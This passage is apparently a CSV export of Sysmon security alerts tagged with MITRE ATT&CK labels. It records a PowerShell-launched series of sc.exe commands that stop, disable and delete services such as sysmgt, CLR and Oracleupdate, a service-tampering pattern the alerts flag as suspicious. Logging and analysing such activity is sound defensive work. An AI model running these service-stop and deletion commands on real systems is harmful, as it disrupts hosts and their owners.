Stop sysmgt\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:33.908"",""processGuid"":""{df9fc3d3-b35d-5ecf-0000-001060301900}"",""processId"":""3932"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® 
Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop sysmgt"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:01.979",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:33.878 +ProcessGuid: {df9fc3d3-b35d-5ecf-0000-0010092e1900} +ProcessId: 956 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop CLR +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: 
""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop CLR",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:33.879902700Z"",""eventRecordID"":""2042"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:33.878\r\nProcessGuid: {df9fc3d3-b35d-5ecf-0000-0010092e1900}\r\nProcessId: 956\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop CLR\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:49:33.878"",""processGuid"":""{df9fc3d3-b35d-5ecf-0000-0010092e1900}"",""processId"":""956"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop CLR"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:01.939",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:33.858 +ProcessGuid: {df9fc3d3-b35d-5ecf-0000-0010792c1900} +ProcessId: 1808 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete Oracleupdate +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete Oracleupdate",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:33.859849900Z"",""eventRecordID"":""2040"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:33.858\r\nProcessGuid: {df9fc3d3-b35d-5ecf-0000-0010792c1900}\r\nProcessId: 1808\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete Oracleupdate\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:33.858"",""processGuid"":""{df9fc3d3-b35d-5ecf-0000-0010792c1900}"",""processId"":""1808"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete Oracleupdate"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:01.901",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:33.848 +ProcessGuid: {df9fc3d3-b35d-5ecf-0000-0010b22b1900} +ProcessId: 6132 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Oracleupdate +CurrentDirectory: 
C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Oracleupdate",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:33.849912400Z"",""eventRecordID"":""2039"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:33.848\r\nProcessGuid: {df9fc3d3-b35d-5ecf-0000-0010b22b1900}\r\nProcessId: 6132\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Oracleupdate\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:33.848"",""processGuid"":""{df9fc3d3-b35d-5ecf-0000-0010b22b1900}"",""processId"":""6132"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Oracleupdate"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:01.822",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:33.817 +ProcessGuid: {df9fc3d3-b35d-5ecf-0000-001059291900} +ProcessId: 5508 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 
(WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop system +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop system",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:33.819678100Z"",""eventRecordID"":""2036"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:33.817\r\nProcessGuid: {df9fc3d3-b35d-5ecf-0000-001059291900}\r\nProcessId: 5508\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop system\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John 
Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:33.817"",""processGuid"":""{df9fc3d3-b35d-5ecf-0000-001059291900}"",""processId"":""5508"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop system"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:01.774",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:33.785 
+ProcessGuid: {df9fc3d3-b35d-5ecf-0000-0010fd261900} +ProcessId: 1088 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Microsoft +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Microsoft",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:33.787421900Z"",""eventRecordID"":""2033"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:33.785\r\nProcessGuid: {df9fc3d3-b35d-5ecf-0000-0010fd261900}\r\nProcessId: 1088\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: 
\""C:\\Windows\\system32\\sc.exe\"" Stop Microsoft\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:33.785"",""processGuid"":""{df9fc3d3-b35d-5ecf-0000-0010fd261900}"",""processId"":""1088"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Microsoft"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", 
+"May 29, 2020 @ 14:18:01.759",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:33.774 +ProcessGuid: {df9fc3d3-b35d-5ecf-0000-001035261900} +ProcessId: 4208 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config Microsoft Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config Microsoft Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:33.777639400Z"",""eventRecordID"":""2032"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:33.774\r\nProcessGuid: {df9fc3d3-b35d-5ecf-0000-001035261900}\r\nProcessId: 4208\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 
(WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config Microsoft Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:33.774"",""processGuid"":""{df9fc3d3-b35d-5ecf-0000-001035261900}"",""processId"":""4208"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft 